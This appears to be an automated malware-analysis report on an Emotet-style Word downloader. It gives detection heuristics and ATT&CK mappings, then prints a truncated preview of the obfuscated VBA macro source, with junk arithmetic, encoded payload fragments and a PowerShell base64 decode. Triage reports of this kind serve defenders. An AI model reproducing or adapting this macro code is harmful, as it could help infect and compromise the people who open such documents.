MALICIOUS
Risk Score: 224
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1105 Ingress Tool Transfer
The sample is a malicious Office document containing a VBA macro. The macro is triggered by the AutoOpen function and uses CreateObject, most likely to download and execute a second-stage payload, as indicated by the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic. The ClamAV detection further confirms its malicious nature. The macro code itself is heavily obfuscated, which prevents a more detailed analysis of its specific actions or of the exact URL it contacts.
Heuristics (8)
- ClamAV: Doc.Malware.Emodldr-10025032-0 (severity: critical; rule: CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (severity: medium; 3 related findings; rule: OLE_VBA_MACROS). Document contains VBA macro code.
- AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN). AutoOpen macro.
- CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ). CreateObject call.
- VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC). Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (severity: info; rule: EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 38325 bytes |

SHA-256: e07303ce277b6b1836a7bc99277809a9153d0625e79d9a910d9f7e85b871844d

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 9 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "kjJmjwCVAHFUNa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "IkhumzWmiNqv"
Function aDPoQiizUWqFwP()
On Error Resume Next
sIbds = 36919 * 54664
DYWHrU = (90749 + CDate(3735 / Atn(wECik)) / 51218 * iZISp * 77091 * CInt(ffuUJi) * uULjKY / CSng(cDSMK))
zsNXIi = Tan(35439)
VDVYZr = PlGPtl("@m%2X7TL7Innx30Hs6d08b4l7sd5Ht/l9Df6s7L7ol3xOc930d4Yp/i8tXPi8wz3wD/Y0eI82BH3B7uJiVKOp", 4, 76)
SKKmPp = 82221 * 53772
AlTVCk = (83870 + CDate(90458 / Atn(BDCVpF)) / 60760 * jmSXLb * 30946 * CInt(bJBzuj) * AFSbq / CSng(zIVch))
OwzUEG = Tan(33155)
PvRQch = 54810 * 81329
rWZqJj = (55901 + CDate(99330 / Atn(Dldaw)) / 71914 * wYtjv * 7710 * CInt(PmEiw) * hhZMw / CSng(XfMjwi))
ZJQWpz = Tan(60889)
bbAWU = PlGPtl("qNvG7Z8QfdgZ7n9m9G2f+WT7tnJx+xvtWzuwOigvWZ/jb2nOnc3fm78zihvvMPvjhzY+x8poxvvxuUyV/GfeY/yvgLO0PbgJ8Ib7AzTPshX+5xf8EvLm4b5G+r209mn8b4GJn+w7IC/Y72z/V+1dbV/a95Rl+1ZbPV+arV", 4, 160)
dIjGCn = 17063 * 19577
EEjkm = (42089 + CDate(23449 / Atn(bCNsl)) / 84578 * BJiEzQ * 28921 * CInt(QXDYqF) * FOVIbs / CSng(AmnEF))
wRwrQ = Tan(73230)
OVoaNR = 37671 * 67279
wzHWwR = (63071 + CDate(41113 / Atn(tziUzh)) / 1282 * jEAcP * 12836 * CInt(wpQcO) * JUGks / CSng(iuNMS))
POfGt = Tan(44383)
zwwai = PlGPtl("D63F5Z7k753wulM+xI/JX+qOGetffUl4ga5iv6Cuqsg/xHUjvgaPgIehm+y59CbxkSu/tfJ+lC4wnmC/Wkn3Uk8VM,", 7, 82)
ZzhPi = 7022 * 62502
kaHBEH = (89451 + CDate(69721 / Atn(XkFHSV)) / 43359 * hIAsqp * 92637 * CInt(UoEbFY) * MiwUGL / CSng(MVdCj))
SzHcL = Tan(45074)
dqBAt = 18355 * 42316
BvuBVr = (83073 + CDate(74313 / Atn(BwDYVP)) / 18434 * coIlM * 73346 * CInt(JaMqz) * pwJof / CSng(qNXwk))
hmROwH = Tan(50247)
CFOlzQD = PlGPtl("5%QB,xW8CfGUXmI/l+Zn/N7", 6, 16)
jQVNzo = 18005 * 44359
uiAodM = (5235 + CDate(88415 / Atn(qzSDFp)) / 45122 * fzGud * 9891 * CInt(GSYav) * qJTVcU / CSng(rDZOUN))
cYfKf = Tan(81657)
FEvWwH = 81916 * 61723
CWwQdB = (19082 + CDate(19883 / Atn(GTLFc)) / 53440 * AcmPmO * 44587 * CInt(uUSFPw) * huwrWU / CSng(TIIOl))
PdzbTX = Tan(95720)
pvdaiow = PlGPtl("n4lE76TR1gJfezlVHptu6/tJKNwjX3Ryl/xHUtyrWhW/1/wjiqf8ZlgmPnvNT6gOs6+x9X/ct53ie67s5t0z/s7RJBzL+CcfUV0lXQm/wf4Qgiw5", 7, 103)
ERwnzw = 43833 * 18007
EvDNlQ = (18115 + CDate(72536 / Atn(idJdG)) / 44880 * YkQUqm * 83432 * CInt(OddwD) * VAJYE / CSng(ildMp))
OtUVaK = Tan(51490)
iYQoPz = 74367 * 57657
tpNpY = (63568 + CDate(20463 / Atn(cIArL)) / 77110 * JIhPEr * 33774 * CInt(iHqwri) * pUYJw / CSng(shhYK))
NcBsSk = Tan(48250)
jEMUuWwKC = PlGPtl("%sBERT]::FroMbaSE64StrING( 'TVhdc+JGEPwrPKTKkMpRIODy8bYEFVZyK07YSkpc3QNHyBpj7JTtsmzX/fjsdPfKftpCWuRD5G", 4, 95)
HRXZIb = 86334 * 58322
hkSSbS = (61329 + CDate(34649 / Atn(pmQbA)) / 82080 * EDUhPY * 23160 * CInt(DtYwz) * WMOzz / CSng(rUmJVa))
vmOjQ = Tan(63082)
KmLfNv = 48889 * 64277
oTdJsl = (89233 + CDate(55280 / Atn(ajEpIX)) / 59909 * dTLGHa * 50674 * CInt(FsPnt) * LvFSA / CSng(LuhCdd))
EqUdo = Tan(1196)
vVpMGj = PlGPtl("SKNRfwEHkAewYNL22/4LFivS8QdvJjyGv1s33B7lF/e7M1k10H5fUFeEm4r2st,m", 6, 57)
RGWohs = 6687 * 99648
tfpzIV = (17245 + CDate(69028 / Atn(XjXjlI)) / 55123 * OVSlOa * 74905 * CInt(AFZRk) * sMHoX / CSng(fDjhkm))
RGiUN = Tan(22985)
QSnjvH = 89697 * 30188
OjhaK = (30013 + CDate(67403 / Atn(HWFbE)) / 79522 * EHPvN * 75517 * CInt(IWGCcI) * HomHj / CSng(ojwbQ))
NjwvYM = Tan(56335)
qqNJYpuzEI = PlGPtl("db/04kHa6aS3fpLYfL", 2, 12)
inrzB = 44273 * 61762
KUImaq = (530 + CDate(66383 / Atn(TYZkY)) / 17287 * iQaCLa * 66267 * CInt(zumTwm) * JjNVi / CSng(dWWjO))
EnDdGi = Tan(5809)
DodiK = 53901 * 78249
zcSzf = (98744 + CDate(72209 / Atn(zauHkf)) / 91418 * chlON * 12753 * CInt(JlwiSm) * FwDjQ / CSng(kntSA))
OcpOkX = Tan(86589)
iBjEvPDtP = PlGPtl(",4h9ueq7UPwq8+NZ9YXVB9Z7POcZuMO9TrxxFD7e8uMD7fCIa6P3FfGGulJ+nJ1TK06oI/Ab66kxXph0dUHRM8n@S", 3, 80)
Fdqaw = 85384 * 74846
LiQSz = (76684 + CDate(40649 / Atn(EEPdmp)) / 76712 * OfrMT * 44019 * CInt(LZiEc) * dhXfa / CSng(KBhjaH))
KfH
... (truncated)